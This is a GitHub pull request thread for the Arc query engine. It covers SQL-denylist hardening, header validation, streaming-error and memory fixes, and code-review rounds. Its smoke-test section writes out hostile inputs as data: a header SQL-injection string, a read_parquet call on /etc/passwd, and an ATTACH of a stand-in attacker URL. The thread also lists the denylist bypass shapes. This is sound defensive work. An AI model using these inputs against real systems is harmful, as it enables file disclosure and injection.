fix(query): six critical-path hardening fixes from query-path review #414
Conversation
A 4-agent staff/principal-engineer review of the query execution path (mirror of the ingest review that produced PR #413) surfaced six issues we want addressed before 26.05.1 GA. All are fixed here. Bench delta is within the 5% no-regression budget on a 99.9M-row ClickBench GROUP BY workload (JSON p95 75.86ms → 78.58ms, Arrow p95 76.14ms → 78.36ms).

**C1 — Expanded SQL denylist + comment-strip + literal-mask normalisation.** The query API guardrail previously gated only DDL/DML keywords. It now also gates `ATTACH`/`DETACH`/`COPY`/`EXPORT`/`IMPORT DATABASE`/`PRAGMA`/`SET <var> =`/`LOAD`/`INSTALL`/`CALL` — session/extension/file-system ops that don't belong in a read-only query path. `ValidateSQLRequest` now strips comments and masks string literals before the regex check, so `DROP /* */ TABLE x` cannot interleave comments past token boundaries and `SELECT 'DROP TABLE x'` is not falsely rejected. Also removed the dead `(h *QueryHandler).validateSQL` method (a code-quality finding from the same review). The test matrix covers every blocked keyword plus comment-injection and quoted-identifier false-positive cases.

**C2 — `x-arc-database` header validation + universal `read_parquet` path quoting.** The header value lands inside the `read_parquet('<base>/<db>/...')` storage paths Arc generates internally; in some edge cases a header containing a single quote or shell-active character could break out of the literal. A new `validateHeaderDatabase` helper validates at every entry point (`executeQuery`, `executeQueryArrow`, `estimateQuery`), and a new `quotePath()` helper routes every `read_parquet('PATH', ...)` interpolation site through `sqlutil.EscapeStringLiteral` (added to `internal/sql/mask.go` as a single source of truth). Eight `read_parquet` sites in `query.go` were converted. Tests cover SQLi vectors (quote, NUL, newline, comma, backslash, path traversal) and boundary conditions.

**C3 — Reject direct `read_parquet()` in user SQL + extend CTE name regex.**
Arc's transformation layer is the only legitimate source of `read_parquet` — in some edge cases, a user query containing `read_parquet` directly produced zero extracted table references and bypassed the (database, measurement) RBAC pair-check. `ValidateSQLRequest` now rejects user SQL containing `read_parquet(`. Companion fix: the CTE-name extraction regex was extended to recognise the parenthesized column-list form (`WITH foo(c1, c2) AS (...)`), so a CTE name doesn't leak into the table-reference list. Tests cover `read_parquet` in JOINs, subqueries, and CTEs, plus the new CTE column-list parse.

**C4 — Parallel-partition partial failure now fails the whole request.** When the parallel executor fans a query out across N partitions and one or more partition queries error, `NewMergedRowIterator` previously returned the surviving partitions' rows as a 200/success — a fraction of the result silently dropped. The handler now inspects per-partition `Error` after `ExecutePartitioned` and fails the request with HTTP 500 on any partition error. Companion fix in `parallel_executor.go`: the goroutine fan-out semaphore is acquired in the launch loop instead of inside each spawned goroutine, so a 10K-path query bounds in-flight goroutines at `MaxConcurrentPartitions` (default 4) instead of spawning 10K goroutines parked on the semaphore.

**C5 — Streaming-response error semantics.** `streamTypedJSON` and `streamArrowJSON` previously returned only the row count; in some edge cases (Scan failures mid-stream, deferred `*sql.Rows.Err()`, context cancellation after the response envelope was already flushed) the loop silently `continue`'d and the caller marked the query `Complete(rowCount)`. Both functions now return `(int, error)`, perform a `ctx.Err()` check at every row/batch boundary, and check the iterator's deferred error after the loop. Callers route any error to `IncQueryErrors`, registry `Fail()` (or `TimedOut()` on `context.DeadlineExceeded`), and an Error log line.
The HTTP status cannot be changed retroactively (headers are already flushed), but operator-side observability is now correct. The Arrow IPC stream loop in `executeQueryArrow` adopts the same per-batch ctx-check pattern.

**C6 — Arrow IPC streaming memory pinned by deferred Release.** The `executeQueryArrow` IPC loop used `defer batch.Release()` inside the `for reader.Next()` body. Defers accumulate until the enclosing closure exits — for a 10M-row result with 10K-row batches, 1,000 deferred Release calls held all casted Arrow records alive until the entire stream completed. The loop now releases each casted batch explicitly after `ipcWriter.Write`, restoring constant per-batch memory. The reader-owned input batch needs no Release; `reader.Next()` releases the prior record automatically.

Build clean; the full `./internal/api/...` `./internal/query/...` `./internal/queryregistry/...` `./internal/database/...` test suites pass. A smoke test against running Arc verified that all four attack vectors (header SQLi, direct `read_parquet`, ATTACH RCE, PRAGMA hardening) are rejected and legitimate queries still work.
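The C1 normalise-then-match order can be sketched roughly as follows. This is an illustrative stand-in for `ValidateSQLRequest`, not Arc's code: the regexes, keyword list, and helper names are assumptions, and a production validator would want a single-pass tokenizer, since sequential regex substitution can mishandle quote characters inside comments (and comment markers inside literals) in pathological inputs.

```go
package main

import (
	"fmt"
	"regexp"
)

// Sequential passes: strip comments, then mask string literals, then run
// the denylist. Comments are replaced with a space because a comment acts
// as whitespace (a token separator) in SQL.
var (
	blockComment = regexp.MustCompile(`(?s)/\*.*?\*/`)
	lineComment  = regexp.MustCompile(`--[^\n]*`)
	stringLit    = regexp.MustCompile(`'(?:[^']|'')*'`)
	denylist     = regexp.MustCompile(`(?i)\b(DROP|DELETE|INSERT|UPDATE|CREATE|ALTER|ATTACH|DETACH|COPY|EXPORT|IMPORT|PRAGMA|SET|RESET|LOAD|INSTALL|CALL)\b`)
)

// normalize strips comments and masks literal contents so keywords inside
// strings never match, and keywords split by comments do.
func normalize(sql string) string {
	sql = blockComment.ReplaceAllString(sql, " ")
	sql = lineComment.ReplaceAllString(sql, " ")
	return stringLit.ReplaceAllString(sql, "'?'")
}

// Blocked reports whether the normalized SQL trips the denylist.
func Blocked(sql string) bool {
	return denylist.MatchString(normalize(sql))
}

func main() {
	fmt.Println(Blocked("DROP/*hidden*/TABLE x"))      // comment-split keyword
	fmt.Println(Blocked("SELECT 'DROP TABLE x' AS s")) // keyword inside literal
	fmt.Println(Blocked("ATTACH 'http://x/db' AS e"))  // session/file-system op
}
```

Masking literals before matching is what lets the denylist stay aggressive without rejecting legitimate queries that merely mention a blocked word inside a string.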
/gemini review @gemini-code-assist this PR addresses six critical-path findings from a 4-agent staff/principal-engineer review of Arc's query execution path — companion to the ingest-path review that landed as #413. Please pay particular attention to:
- Bench delta on 99.9M-row ClickBench GROUP BY: JSON p95 +3.6%, Arrow p95 +2.9% — within the 5% budget.
- Smoke test against running Arc verified all four attack vectors (header SQLi, direct `read_parquet`, ATTACH RCE, PRAGMA hardening) reject correctly while legitimate queries return successfully.

Looking for any findings.
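For reference, the two C2 defenses behind the header-SQLi vector above (header allowlisting plus literal escaping) can be sketched as follows. The helper names and the exact allowlist are assumptions standing in for Arc's `validateHeaderDatabase` and `sqlutil.EscapeStringLiteral`, not the actual implementation.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// validDBName permits only letters, digits, underscore, and hyphen, so
// quotes, NUL bytes, whitespace, and path separators can never reach a
// read_parquet('<base>/<db>/...') storage path. The exact character set is
// an assumption for this sketch.
var validDBName = regexp.MustCompile(`^[A-Za-z0-9_-]+$`)

func validateHeaderDatabase(v string) error {
	if !validDBName.MatchString(v) {
		return fmt.Errorf("invalid x-arc-database header: name contains invalid characters")
	}
	return nil
}

// escapeStringLiteral doubles single quotes (the standard SQL escaping
// rule), so an interpolated value cannot terminate the literal around it.
func escapeStringLiteral(s string) string {
	return strings.ReplaceAll(s, "'", "''")
}

func main() {
	fmt.Println(validateHeaderDatabase("clickbench") == nil)
	fmt.Println(validateHeaderDatabase(`evil', x=1) --`) == nil)
	fmt.Println("read_parquet('" + escapeStringLiteral("a'b") + "')")
}
```

Defense in depth is the point: even if a hostile value slipped past the allowlist, the escaping at every interpolation site keeps it inside the string literal.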
Code Review
This pull request implements significant hardening of the query execution path, addressing security vulnerabilities and correctness issues identified during a staff-level review. Key changes include expanding the SQL denylist to block RCE-class operations, introducing robust input validation for the x-arc-database header, and ensuring safe path interpolation via a new quotePath helper. Additionally, the PR improves error handling for streaming responses and parallel partition execution to prevent silent data loss, and optimizes memory usage in Arrow IPC streaming. I have provided feedback on further tightening the SQL denylist regex and ensuring consistent context usage for streaming responses.
Code Review
This pull request implements critical security hardening and correctness fixes for the query execution path. Key changes include expanding the SQL denylist with normalization (comment stripping and literal masking), validating the x-arc-database header, and preventing direct read_parquet calls in user SQL to enforce RBAC. Additionally, the PR ensures partial failures in streaming and parallel execution are surfaced as errors rather than silent partial results, and it fixes a memory leak in Arrow IPC streaming by releasing batches explicitly. Review feedback suggests using more idiomatic select blocks for context cancellation checks within streaming loops and simplifying error collection logic.
…elect

Addresses 5 new gemini findings on PR #414 commit 244849b. One MEDIUM (G4 — simplify error-collection loop) was a no-op suggestion identical to the existing code; skipped.

**CRITICAL (gemini G1) — SET regex bypassable.** The previous `\bSET\s+(?:GLOBAL\s+|...)?\w+\s*=` form required an equals sign and a word after the optional scope keyword. DuckDB also accepts:

- `SET enable_external_access TO true` (`TO` instead of `=`)
- `SET VARIABLE x = 1` (`VARIABLE` keyword)
- `RESET enable_external_access` (mutates session state)

All three slipped past the regex. Replaced the multi-form pattern with bare `\bSET\b` and added `\bRESET\b`. The query API is read-only, so any session-state mutation is forbidden — a bare-keyword match is correct here. New regression tests cover all three bypass shapes.

**CRITICAL (gemini G2) — CALL regex bypassable.** `\bCALL\s+\w+` required whitespace before the procedure name, but DuckDB accepts `CALL(proc_name)` with no space. Replaced with bare `\bCALL\b`. Regression test added for the no-space form.

**MEDIUM (gemini G3) — queryMeasurement streamCtx.** Switched from `context.Background()` to `c.UserContext()` so client disconnects propagate to per-row cancellation. Fasthttp keeps `c.Context()` alive across the `SetBodyStreamWriter` boundary, so it is safe inside the async stream callback (consistent with the `executeQuery` and `executeQueryArrow` patterns).

**MEDIUM (gemini G5+G6) — idiomatic select for ctx cancellation.** Replaced `if ctx.Err() != nil` with `select { case <-ctx.Done(): ... default: }` at three call sites — `streamTypedJSON`, `streamArrowJSON`, and the Arrow IPC stream loop in `executeQueryArrow`. This required labeled breaks (`break scanLoop` / `batchLoop` / `streamLoop`) because a plain `break` inside a select-in-for would only break the select. Same semantics, more idiomatic Go.

Bench: two runs on warm state show JSON avg 72.64-73.85ms, p95 74.34-81.31ms; Arrow avg 72.30-73.66ms, p95 74.30-75.50ms — well within run-to-run jitter of baseline (73ms avg / 76ms p95).
The "+3.6% JSON p95" delta from the initial commit appears to have been first-restart cold-cache noise, not a real regression. Build clean (default + -tags=duckdb_arrow); full test sweep across internal/api/... internal/query/... internal/queryregistry/... internal/database/... passes.
/gemini review @gemini-code-assist round 2 fixes pushed in commit 892d24c. All 5 actionable findings addressed; G4 (simplify error-collection loop) was a no-op suggestion — your snippet is identical to the existing code, so I skipped it.

- 🚨 G1 (CRITICAL) — SET regex bypassable: replaced with a bare `\bSET\b` anchor plus `\bRESET\b`
- 🚨 G2 (CRITICAL) — CALL regex bypassable: replaced with a bare `\bCALL\b` anchor
- G3 (MEDIUM) — queryMeasurement ctx: switched to `c.UserContext()` so client disconnects propagate
- G5+G6 (MEDIUM) — idiomatic select for ctx: labeled-break `select` at three streaming call sites
Bench: two runs on warm state show JSON avg 72.6-73.9ms / p95 74.3-81.3ms; Arrow avg 72.3-73.7ms / p95 74.3-75.5ms — well within run-to-run jitter of baseline (73ms avg / 76ms p95). The "+3.6% JSON p95" delta from the initial commit appears to have been first-restart cold-cache noise. Looking for any final findings.
Code Review
This pull request implements comprehensive security hardening and correctness fixes for the query execution path. Key improvements include an expanded SQL denylist that blocks session and file-system operations, normalized SQL validation that strips comments and masks literals, and strict validation of the x-arc-database header to prevent path injection. The changes also ensure that partial failures in parallel and streaming queries are correctly surfaced as errors rather than silent successes. Furthermore, a memory leak in Arrow IPC streaming was resolved by explicitly releasing record batches, and the parallel executor was optimized to bound goroutine creation. I have no feedback to provide.
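The defer-in-loop pitfall behind the Arrow IPC memory fix (C6) can be illustrated without any Arrow dependency. `batch` below is a toy refcount stand-in for an Arrow record; the point is that `defer` runs when the enclosing function returns, not per loop iteration.

```go
package main

import "fmt"

type batch struct{ id int }

var live int // number of batches currently retained

func acquire(id int) *batch { live++; return &batch{id} }
func (b *batch) Release()   { live-- }

// streamWithDefer mimics `defer batch.Release()` inside the loop body: all
// deferred calls pile up until the closure exits, so every batch stays
// alive for the whole stream.
func streamWithDefer(n int) (peak int) {
	func() {
		for i := 0; i < n; i++ {
			b := acquire(i)
			defer b.Release() // runs only when this closure returns
			if live > peak {
				peak = live
			}
		}
	}()
	return
}

// streamExplicit releases each batch at the end of its iteration,
// restoring constant per-batch footprint.
func streamExplicit(n int) (peak int) {
	for i := 0; i < n; i++ {
		b := acquire(i)
		if live > peak {
			peak = live
		}
		b.Release() // released every iteration
	}
	return
}

func main() {
	fmt.Println("deferred peak:", streamWithDefer(1000)) // all 1000 held at once
	fmt.Println("explicit peak:", streamExplicit(1000))  // constant: 1
}
```

With real Arrow records the retained memory is the full batch data, so for a 10M-row stream the difference is the entire result set versus a single batch.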
The C1 denylist bullet listed `SET <var> =`/`CALL` (the original, narrower regex forms). After gemini round 1 found the bypass shapes (`SET ... TO`, `SET VARIABLE`, `RESET`, and `CALL` with no whitespace before the paren), the regex was simplified to bare-keyword anchors and `RESET` was added. The release notes should be updated to match.
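The round-1 bypass shapes are easy to reproduce against a narrow pattern. The `oldSet` regex below is a simplified stand-in for the original form (the elided scope alternatives are guessed), while `newSet` is the bare-keyword anchor that replaced it.

```go
package main

import (
	"fmt"
	"regexp"
)

var (
	// Simplified stand-in for the original narrow form: requires a word and
	// an equals sign after the optional scope keyword.
	oldSet = regexp.MustCompile(`(?i)\bSET\s+(?:GLOBAL\s+|SESSION\s+|LOCAL\s+)?\w+\s*=`)
	// The replacement: bare keyword anchors, plus RESET.
	newSet = regexp.MustCompile(`(?i)\b(SET|RESET)\b`)
)

func main() {
	for _, q := range []string{
		"SET enable_external_access TO true", // TO instead of =
		"SET VARIABLE x = 1",                 // VARIABLE keyword
		"RESET enable_external_access",       // session-state mutation
	} {
		fmt.Printf("old=%v new=%v  %s\n", oldSet.MatchString(q), newSet.MatchString(q), q)
	}
}
```

All three shapes evade the narrow form but trip the bare-keyword anchor, which is safe to use only because the endpoint is read-only: there is no legitimate reason for user SQL on this path to contain `SET` or `RESET` at all.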
Summary
A 4-agent staff/principal-engineer review of the query execution path (mirror of the ingest review that produced #413) surfaced 8 raw CRITICALs, 27 HIGH, 50 MEDIUM, 24 LOW findings — deduplicated to 6 unique CRITICALs, all addressed in this PR. The remaining HIGH/MEDIUM/LOW findings will be filed as separate issues in a follow-up.
The 6 Fixes
| Fix | Files |
| --- | --- |
| C1 — Expanded SQL denylist + comment-strip + literal-mask normalisation | `query.go:506-541` |
| C2 — `x-arc-database` header validation + universal `read_parquet` path quoting | `query.go` (8 sites), `query_arrow.go:52`, `internal/sql/mask.go` |
| C3 — Reject direct `read_parquet()` in user SQL + extend CTE name regex | `query.go:506+` (read_parquet rejection), `query.go:75` (CTE regex) |
| C4 — Parallel-partition partial failure fails the whole request | `query.go:1238+` (caller), `query/parallel_executor.go:97+` |
| C5 — `streamTypedJSON`/`streamArrowJSON` return `(int, error)`; per-row/per-batch ctx check; registry Fail/TimedOut on partial failure | `query_json_writer.go:80`, `query_arrow_json.go:169`, `query_arrow.go:128`, `query.go` (3 callsites) |
| C6 — Explicit `batch.Release` per iteration | `query_arrow.go:147` |

Bench Delta (within 5% no-regression budget)
Workload: `SELECT RegionID, COUNT(*), SUM(ResolutionWidth) FROM clickbench.hits GROUP BY RegionID ORDER BY 2 DESC LIMIT 100` on 99.9M rows, 20 iterations per format.

JSON and Arrow paths both go through `executeArrowJSONQuery` → `streamArrowJSON` in the production build (`-tags=duckdb_arrow`), so the per-row ctx check in `streamTypedJSON` (only on the database/sql fallback) is NOT on the hot path. The most likely sources of the small delta are the expanded `ValidateSQLRequest` pipeline (mask literals + strip comments + larger denylist regex + the new `userSQLReadParquetPattern` check), which now runs three regex passes per request instead of one, and the `quotePath()` helper allocations. All are on the per-request path; well within the 5% budget.

Test Plan
- `go test ./internal/api/... ./internal/query/... ./internal/queryregistry/... ./internal/database/...` (no-tags)
- `go test -tags=duckdb_arrow ./internal/api/...` (Arrow code paths)
- `go build ./internal/... ./cmd/...`

Smoke tests against a running Arc:

- `x-arc-database: evil', enable_external_access=true) UNION SELECT 1 FROM read_parquet('y` → 400 `invalid x-arc-database header: name contains invalid characters`
- `SELECT * FROM read_parquet('/etc/passwd')` → 400 `Direct read_parquet() calls are not allowed in user SQL`
- `ATTACH 'http://attacker/db' AS evil` → 400 `Dangerous SQL operation not allowed`
- `PRAGMA enable_external_access=true` → 400 `Dangerous SQL operation not allowed`
- `SELECT COUNT(*) FROM clickbench.hits` → `99,997,497` rows, 1 ms

New and extended tests:

- `TestDangerousSQLPatterns` extended with 13 RCE-class keyword cases + 4 case variations (now goes through `ValidateSQLRequest`, not the raw regex)
- `TestValidateSQLRequest_BypassesAndFalsePositives` — comment-injection bypasses + literal/quoted-identifier false-positive tolerance + 6 direct `read_parquet` call rejections
- `TestValidateHeaderDatabase` — 18 cases covering legitimate values + 11 SQLi/path-traversal vectors
- `TestQuotePath` — 6 cases pinning the escape contract
- `TestExtractCTENames` extended with 3 cases for the parenthesized CTE column-list form
- `TestStreamTypedJSON_ReturnsErrorOnScanFailure` and `..._OnCtxCancel` for the C5 contract

Review-Agent Reports
The 4 agent reports (correctness / security / code quality / perf) are retained in the conversation transcript that drove this PR; the remaining HIGH/MEDIUM/LOW findings (~80 items after dedup against #313/#309/#308/#307/#334/#332/#331/#330/#352) will be filed as individual GitHub issues after this PR opens.
🤖 Generated with Claude Code